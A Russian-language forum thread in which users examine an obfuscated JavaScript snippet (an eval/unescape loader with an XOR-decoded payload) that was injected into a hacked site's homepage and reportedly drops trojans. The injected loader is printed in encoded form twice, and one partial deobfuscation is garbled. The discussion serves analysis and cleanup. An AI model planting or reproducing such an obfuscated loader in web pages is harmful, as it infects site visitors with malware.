понять javascript

[Славка]

кто понимает, объясните пожалуйста, что делает этот скрипт

<script type="text/javascript">if (navigator.userAgent.indexOf('MSIE') != -1) { document.writeln(''); }</script> <!-- [ 5767d39cca056b2c1b203e71515247f7 ] --><script>eval(unescape('function%20iGaFuI%28czXUp%29%7Bfunction
%20jSEG%28oxGs%29%7Bvar%20dTw%3D0%2CmDuT%2CtlHgNkZ%
3DoxGs.length%3Bfor%28mDuT%3D0%3BmDuT%3CtlHgNkZ%
3BmDuT++%29dTw+%3DoxGs.charCodeAt%28mDuT%29*
tlHgNkZ%3Breturn%20new%20String%28dTw%29%7DczXUp%3
Dunescape%28czXUp%29%3Bvar%20xGqkRq%3
Deval%28%27aNr%25g%25ufmfeYn%5EtYs%25.%5EcNa%5
ElflNe%5EeY%27.replace%28/%5BY%25Nf%5C%5E%5D/
g%2C%20%27%27%29%29.
toString%28%29.replace%28/%5B%5E@a-z0-9A-Z_.%2C-%5D/
g%2C%27%27%29%2CdFf%3DjSEG%28xGqkRq%29%2CcQGWNQE%3
Dnew%20String%28%29%2CyvDk%3D0%3BiTGBYG%3D0%3
Bfor%28var%20myw%3D0%3Bmyw%3CczXUp.length%3Bmyw++
%29%7BcQGWNQE+%3DString.fromCharCode%28czXUp.charCodeAt
%28myw%29%5E%28xGqkRq.charCodeAt%28yvDk%29%5EdFf.charCodeAt
%28iTGBYG%29%29%29%3ByvDk++%3BiTGBYG++%3Bif%28yvDk%
3ExGqkRq.length%29yvDk%3D0%3Bif%28iTGBYG%3EdFf.length
%29iTGBYG%3D0%3B%7Deval%28cQGWNQE%29%3BcQGWNQE%
3D%27%27%3Breturn%3B%7DiGaFuI%28%27%2532%2531%2538%2534%
2530%2534%2538%2534%2549%2503%2533%252b%2535%251d%257f%
256b%2517%2528%2579%2521%252e%250f%2527%2524%257f%252b%
251c%2537%2516%2512%2507%2526%253c%251a%2567%254b%2573%
2538%253f%250f%2528%256f%257d%253c%250a%2526%2508%2571%
257a%257b%2519%253e%2519%250c%2500%2538%2524%2511%2564%
2536%253c%253e%251d%2521%257f%2577%2560%250e%2532%2529%
2502%2518%2507%257d%2533%2521%2523%2544%2562%2509%252b%
2538%2511%2502%2549%2573%2502%2528%2510%2508%2507%2525%
2532%2564%2558%251c%2542%250b%254c%250f%253f%2516%250a%
2509%257e%251e%256c%254d%2551%2563%2545%256c%2535%2512%
252c%250e%250a%2504%252f%257d%257a%2565%2520%2523%2534%
2506%2531%250b%2523%2528%2571%2573%2524%2539%2532%256d%
2573%2536%2504%250c%2537%2563%253b%2509%2533%2537%2538%
2520%252c%251e%252c%251f%2521%2523%252b%2535%2523%252c%
255b%2560%2576%2529%2535%2535%253c%2575%252f%2568%2554%
257a%2557%2523%2511%253c%2530%2523%250f%2576%2506%252a%
2523%256b%256b%2503%250f%2534%253c%253d%2518%256a%2564%
253d%253d%2520%2535%2578%2531%2551%2522%2536%2511%253c%
253a%250d%2575%254c%250d%253f%2558%2512%2528%2569%2535%
2509%2574%2524%2532%2571%2508%2572%2563%256f%253e%2569%
251d%2521%2531%2573%253d%2503%254f%2503%2509%2543%257c%
2579%2519%2538%255a%2523%251c%2520%2508%2502%2522%2542%
257c%252b%2562%2531%2544%255f%256c%2537%2519%251f%2506%
2519%250c%2559%2541%250c%2524%253d%251c%251c%251b%2566%
.............................
%2567%2516%2570%2541%253c%252a%
2530%253c%2522%2514%2526%251c%2504%2557%2579%254d%27%29%3B'));</script><!-- end -->

Добавлено спустя 6 минут 35 секунд:

ой блин

[Vadya corp.]

Код: Выделить всё

function iGaFuI(czXUp) {
    function jSEG(oxGs) {
        var dTw = 0, mDuT, tlHgNkZ = oxGs.length;
        for (mDuT = 0; mDuT < tlHgNkZ; mDuT++) {
            dTw += oxGs.charCodeAt(mDuT) * tlHgNkZ;
        }
        return new String(dTw);
    }
    czXUp = unescape(czXUp);
    var xGqkRq = eval("aNr%g%ufmfeYn^tYs%.^cNa^lflNe^eY".replace(/[Y%Nf\^]/g, "")).toString().replace(/[^@a-z0-9A-Z_.,-]/g, ""), dFf = jSEG(xGqkRq), cQGWNQE = new String, yvDk = 0;
    iTGBYG = 0;
    for (var myw = 0; myw <czXUp> xGqkRq.length) {
            yvDk = 0;
        }
        if (iTGBYG > dFf.length) {
            iTGBYG = 0;
        }
    }
eval(cQGWNQE);
cQGWNQE = "";
return;
}

Дальше лень было )

[Славка]

Vadya corp. хех, ладно, так просто накатаю админам сайта, что у них скрипт левый на главной странице

[ilkonn]

кто понимает, объясните пожалуйста, что делает этот скрипт

<script type="text/javascript">if (navigator.userAgent.indexOf('MSIE') != -1) { document.writeln(''); }</script> <!-- [ 5767d39cca056b2c1b203e71515247f7 ] --><script>eval(unescape('function%20iGaFuI%28czXUp%29%7Bfunction
%20jSEG%28oxGs%29%7Bvar%20dTw%3D0%2CmDuT%2CtlHgNkZ%
3DoxGs.length%3Bfor%28mDuT%3D0%3BmDuT%3CtlHgNkZ%
3BmDuT++%29dTw+%3DoxGs.charCodeAt%28mDuT%29*
tlHgNkZ%3Breturn%20new%20String%28dTw%29%7DczXUp%3
Dunescape%28czXUp%29%3Bvar%20xGqkRq%3
Deval%28%27aNr%25g%25ufmfeYn%5EtYs%25.%5EcNa%5
ElflNe%5EeY%27.replace%28/%5BY%25Nf%5C%5E%5D/
g%2C%20%27%27%29%29.
toString%28%29.replace%28/%5B%5E@a-z0-9A-Z_.%2C-%5D/
g%2C%27%27%29%2CdFf%3DjSEG%28xGqkRq%29%2CcQGWNQE%3
Dnew%20String%28%29%2CyvDk%3D0%3BiTGBYG%3D0%3
Bfor%28var%20myw%3D0%3Bmyw%3CczXUp.length%3Bmyw++
%29%7BcQGWNQE+%3DString.fromCharCode%28czXUp.charCodeAt
%28myw%29%5E%28xGqkRq.charCodeAt%28yvDk%29%5EdFf.charCodeAt
%28iTGBYG%29%29%29%3ByvDk++%3BiTGBYG++%3Bif%28yvDk%
3ExGqkRq.length%29yvDk%3D0%3Bif%28iTGBYG%3EdFf.length
%29iTGBYG%3D0%3B%7Deval%28cQGWNQE%29%3BcQGWNQE%
3D%27%27%3Breturn%3B%7DiGaFuI%28%27%2532%2531%2538%2534%
2530%2534%2538%2534%2549%2503%2533%252b%2535%251d%257f%
256b%2517%2528%2579%2521%252e%250f%2527%2524%257f%252b%
251c%2537%2516%2512%2507%2526%253c%251a%2567%254b%2573%
2538%253f%250f%2528%256f%257d%253c%250a%2526%2508%2571%
257a%257b%2519%253e%2519%250c%2500%2538%2524%2511%2564%
2536%253c%253e%251d%2521%257f%2577%2560%250e%2532%2529%
2502%2518%2507%257d%2533%2521%2523%2544%2562%2509%252b%
2538%2511%2502%2549%2573%2502%2528%2510%2508%2507%2525%
2532%2564%2558%251c%2542%250b%254c%250f%253f%2516%250a%
2509%257e%251e%256c%254d%2551%2563%2545%256c%2535%2512%
252c%250e%250a%2504%252f%257d%257a%2565%2520%2523%2534%
2506%2531%250b%2523%2528%2571%2573%2524%2539%2532%256d%
2573%2536%2504%250c%2537%2563%253b%2509%2533%2537%2538%
2520%252c%251e%252c%251f%2521%2523%252b%2535%2523%252c%
255b%2560%2576%2529%2535%2535%253c%2575%252f%2568%2554%
257a%2557%2523%2511%253c%2530%2523%250f%2576%2506%252a%
2523%256b%256b%2503%250f%2534%253c%253d%2518%256a%2564%
253d%253d%2520%2535%2578%2531%2551%2522%2536%2511%253c%
253a%250d%2575%254c%250d%253f%2558%2512%2528%2569%2535%
2509%2574%2524%2532%2571%2508%2572%2563%256f%253e%2569%
251d%2521%2531%2573%253d%2503%254f%2503%2509%2543%257c%
2579%2519%2538%255a%2523%251c%2520%2508%2502%2522%2542%
257c%252b%2562%2531%2544%255f%256c%2537%2519%251f%2506%
2519%250c%2559%2541%250c%2524%253d%251c%251c%251b%2566%
.............................
%2567%2516%2570%2541%253c%252a%
2530%253c%2522%2514%2526%251c%2504%2557%2579%254d%27%29%3B'));</script><!-- end -->

Добавлено спустя 6 минут 35 секунд:

ой блин

Никуево так скриптик. Кстати Vadya Corp ты где такое образование получал, что в пхп и явескрипте пиздато разбираешься?
Тоже хочу таким быть

[Славка]

ilkonn это ещё не весь скрипт выяснил уже - ломанули сайт и на главной странице этот скрипт разместили, он грузит троянов

[Vadya corp.]

Славка Короче говоря, это строка, которая Escape'нута - то есть URI-encoded, unescape переводит ее в нормальный вид, а eval обрабатывает ее уже как javascript код.

На будущее - Firebug под Firefox показывает нормальный, отevalенный код

ilkonn Хехе, все сам >_< Чет как-то квантовая механика в программировании пока никак не помогла )

[Славка]

Чет как-то квантовая механика в программировании пока никак не помогла )

=) поможет, когда кодить под квантовый комп будешь

[emtec-35]

я не опытный программист, да и с русским проблемы но вся эта байда с "%" - вариант что это отображение папок с кириллистическим именем?

[Iver]

2541%250c%2524%253d%251c%251c%251b%2566%

А это что вообще. У меня иногда фронтпадж начинает вместо букав вот такое же выводить (шифрует что-ли?), Vadya corp., как эту лабуду в удобочитаемый вид привести, не руками же?

[Vadya corp.]

Iver emtec-35

http://www.nigma.ru/index.php?s=%D0%9F%D1%80%D0%B8%D0%B2%D0%B5%D1%82-%D0%BF%D1%80%D0%B8%D0%B2%D0%B5%D1%82

Ссылка такого вида ничего не напоминает?
Просто весь текст переведен в другой вид, все символы заменяются своими html-сущностями (насчет html-сущностей могу ошибаться, но точно это какие-то сущности)
Просто ищите URI decode и будет вам щастье

[Iver]

Ссылка такого вида ничего не напоминает?

Теперь напоминает, кто ж его знал.
Не знал что это URL DECODE называется, даж погуглить не мог - теперь щасье, много, много щасья!

[Marcus]

Че типа умные да декодить трех летний ребенок может -)
сам кому хочешь раскодю
Слабо tcl код декодить?

приведу пример раскодируйте... я посмотрю

Код: Выделить всё

13
dU5D+b7a:@4;?CFA!

[Vadya corp.]

Marcus да, слабо

[Iver]

Че типа умные да декодить трех летний ребенок может -)

Marcus, tcl код декодишь, а с XOR'ом наверно обломаешься *ржу не могу*

сам кому хочешь раскодю

Ну вот, раскодь, умный:

Код: Выделить всё

!нб>б+123/(б+2*74!1$+нб0/-,$#!*)0=?

Это XOR, 36 символов *ржет под столом*. Не знаю как 3х летний ребенок, но 7и летняя раскодировала при мне!

[Никитин Максим]

Йопта, почему ни кто не может зайти на гугл и посмотреть, почему js выглядит именно так? Ну или перелопатить хабру, чтобы вообще забить на этот код и написать свой ыы

[LMsd]

походу скрипт генерился серверным скриптом ) или программистом извращенцем

[Славка]

Никитин Максим я просто не совсем точно сформулировал свой вопрос. Изначально мой пост выглядел иначе, не ожидал, что вставка кода будет так выглядеть. Начал расставлять переносы, надоело, просто обрезал. А хотелось знать именно алгоритм того,что делает скрипт. Я js не изучал, поэтому прошу помочь знающих людей. Если вы понимаете js, прошу пожаловать на crypta.ru только ради бога, не IE открывайте, не в курсе как ff отрегирует, я в опере туда захожу

Добавлено спустя 8 минут 16 секунд:

LMsd

генерился серверным скриптом )

ага, изобрели ИИ и скрипт сам пишет проги. Тут скорей всего протроянен тот, у кого ftp аккаунт от сервера. Дальше дело техники. Админы сайта удаляют эту ерундовину с сайта, а она вновь появляется

[LMsd]

Славка я имел ввиду что есть некий набор строк, и скрипт. в скрипт тупо вставляется строка и генерируется HTML код со скриптом, в котором твоя строка. я так делал в своё время)

[Славка]

LMsd так бы и сказал